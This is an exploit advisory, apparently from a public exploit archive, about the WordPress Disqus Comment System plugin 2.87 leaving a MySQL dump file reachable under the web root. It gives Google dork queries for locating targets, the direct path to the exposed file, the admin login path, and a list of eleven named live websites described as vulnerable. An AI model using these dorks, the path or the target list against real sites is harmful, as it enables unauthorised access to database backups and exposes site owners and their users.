#################################################################################################
# Exploit Title : WordPress Disqus Comment System Plugin 2.87 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
# Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
+ github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
intext:''© 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:''© 2017 Longlife Magazine - All Rights Reserved.''
intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
# Note : the exposed file is a MySQL dump (see the dump header below) shipped as a test fixture inside the plugin directory under the web root, so it is served as a plain static file without any authentication or access control.
#################################################################################################
-- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.1.48
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################